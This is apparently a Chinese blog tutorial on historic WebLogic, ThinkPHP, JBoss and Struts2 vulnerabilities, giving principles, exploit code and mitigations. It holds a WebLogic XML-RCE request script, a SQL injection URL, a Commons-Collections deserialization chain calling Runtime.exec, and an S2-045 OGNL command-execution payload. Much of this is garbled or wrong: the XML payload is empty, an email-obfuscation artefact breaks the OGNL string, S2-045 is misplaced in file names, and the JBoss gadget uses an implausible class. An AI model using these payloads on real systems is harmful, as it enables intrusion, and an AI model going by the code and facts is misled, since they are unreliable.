深入剖析 Weblogic、ThinkPHP、Jboss、Struct2 历史漏洞

目录

深入剖析 Weblogic、ThinkPHP、Jboss、Struct2 历史漏洞

一、Weblogic 漏洞

（一）漏洞原理

（二）漏洞利用代码（Python 示例）

（三）防范措施

二、ThinkPHP 漏洞

（一）漏洞原理

（二）漏洞利用代码（示例，假设存在漏洞的代码片段）

（三）防范措施

三、Jboss 漏洞

（一）漏洞原理

（二）漏洞利用代码（Java 示例，用于构造恶意序列化数据）

（三）防范措施

四、Struct2 漏洞

（一）漏洞原理

（二）漏洞利用代码（示例，构造恶意文件名）

（三）防范措施

---

在网络安全领域，Web 应用程序框架的漏洞一直是黑客攻击的重点目标。今天，我们就来深入探讨 Weblogic、ThinkPHP、Jboss 和 Struct2 这几个常见框架的历史漏洞，不仅会详细讲解漏洞原理，还会附上相关代码示例，帮助大家更好地理解。

一、Weblogic 漏洞

Weblogic 是 Oracle 公司的一款应用服务器，在企业级应用中广泛使用。但它曾出现过多个严重漏洞，如 CVE-2017-10271（WLS 远程代码执行漏洞）。

（一）漏洞原理

该漏洞源于 Weblogic 的 WLS - Web 服务组件在处理 XML 消息时存在缺陷。当服务器解析恶意构造的 XML 请求时，会导致远程代码执行。攻击者可以利用此漏洞，在未授权的情况下，远程执行任意命令，获取服务器权限。

（二）漏洞利用代码（Python 示例）

import requests
import xml.etree.ElementTree as ET

url = "http://目标服务器地址/wls-wsat/CoordinatorPortType"
payload = """

  
    
      
        
      
    
  
  

"""
headers = {
    "Content-Type": "text/xml"
}

response = requests.post(url, data=payload, headers=headers)
if response.status_code == 200:
    print("漏洞可能存在，尝试执行命令成功")
else:
    print("漏洞利用失败或不存在该漏洞")

（三）防范措施

1. 及时更新 Weblogic 版本至官方发布的安全版本，修复已知漏洞。
2. 加强网络访问控制，限制外部对 Weblogic 管理端口的访问，仅允许可信 IP 访问。
3. 开启 Web 应用防火墙（WAF），对 XML 请求进行深度检测，拦截恶意请求。

二、ThinkPHP 漏洞

ThinkPHP 是一款流行的 PHP 开发框架，在国内众多项目中使用。以早期的 SQL 注入漏洞（如 ThinkPHP 5.x 的漏洞）为例进行讲解。

（一）漏洞原理

在 ThinkPHP 5.x 版本中，由于框架对用户输入数据的验证和过滤不严格，当使用某些查询方法时，如果用户输入的数据未经过充分的安全处理，就可能导致 SQL 注入漏洞。攻击者可以通过构造恶意的输入数据，拼接 SQL 语句，从而获取数据库中的敏感信息或执行恶意 SQL 命令。

（二）漏洞利用代码（示例，假设存在漏洞的代码片段）

假设存在如下代码：

namespace app\index\controller;
use think\Controller;
use think\Db;

class Index extends Controller
{
    public function index()
    {
        $id = $this->request->param('id');
        $data = Db::name('user')->where('id', $id)->find();
        return json($data);
    }
}

恶意攻击者可以构造 URL：http://目标网站/index?id=1 or 1=1，这样就可以绕过正常的查询条件，获取所有用户数据。

（三）防范措施

1. 使用框架提供的安全方法进行数据验证和过滤，如使用validate方法对输入数据进行严格校验。
2. 开启框架的内置安全防护机制，如开启REQUEST_FILTER，对所有请求数据进行过滤。
3. 对数据库操作使用预处理语句，避免直接拼接用户输入数据到 SQL 语句中。

三、Jboss 漏洞

Jboss 是一个基于 Java EE 的开源应用服务器，也曾出现过严重漏洞，如 Jboss 反序列化漏洞（CVE - 2017 - 12149）。

（一）漏洞原理

该漏洞是由于 Jboss 在处理 HTTP 请求时，对某些特殊的 HTTP 头字段处理不当，导致攻击者可以通过构造恶意的 HTTP 请求，利用 Java 反序列化机制执行任意代码。当服务器接收到包含恶意序列化数据的请求时，会在反序列化过程中执行攻击者预设的恶意代码。

（二）漏洞利用代码（Java 示例，用于构造恶意序列化数据）

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

public class JbossExploit {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"命令（如whoami或其他恶意命令）"})
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        Class clazz = Class.forName("org.jboss.resteasy.plugins.providers.jackson.ResteasyJackson2Provider");
        Constructor constructor = clazz.getConstructor();
        Object instance = constructor.newInstance();

        Field mapField = clazz.getDeclaredField("unmodifiableMappings");
        mapField.setAccessible(true);
        mapField.set(instance, lazyMap);

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(instance);
        oos.close();

        byte[] serializedData = bos.toByteArray();
        // 这里将serializedData发送到目标Jboss服务器的特定请求中，利用漏洞执行命令
    }
}

（三）防范措施

1. 及时升级 Jboss 到安全版本，修复反序列化漏洞相关的代码缺陷。
2. 禁用不必要的 HTTP 头解析功能，避免服务器处理可能存在风险的请求头。
3. 加强对 Java 反序列化操作的安全控制，使用安全的反序列化库或自定义安全策略。

四、Struct2 漏洞

Struct2 是一个基于 MVC 模式的 Java Web 应用框架，历史上出现过多个高危漏洞，如 S2 - 045（远程代码执行漏洞）。

（一）漏洞原理

该漏洞存在于 Struts2 的文件上传功能中。当应用程序使用 Struts2 进行文件上传时，如果用户上传的文件名包含恶意的 OGNL 表达式，并且服务器对上传文件名未进行严格的过滤和验证，那么在处理上传文件的过程中，OGNL 表达式会被执行，从而导致远程代码执行漏洞。

（二）漏洞利用代码（示例，构造恶意文件名）

假设存在一个文件上传表单，攻击者可以构造上传的文件名如下：

%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='命令（如whoami或其他恶意命令）').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

将这个恶意文件名的文件上传到存在漏洞的 Struct2 应用中，就可能执行恶意命令。

（三）防范措施

1. 升级 Struts2 到安全版本，修复文件上传相关的安全漏洞。
2. 对上传文件名进行严格的过滤，禁止文件名中包含特殊字符和可能的恶意表达式。
3. 限制文件上传的目录权限，确保上传的文件无法被服务器执行。

Weblogic、ThinkPHP、Jboss 和 Struct2 的这些历史漏洞给我们敲响了警钟，开发者和安全运维人员务必高度重视，及时更新软件版本，加强安全配置和输入验证，以保障应用程序的安全。希望通过今天的讲解，大家对这些框架的漏洞有更深入的了解，能够在实际工作中更好地防范安全风险。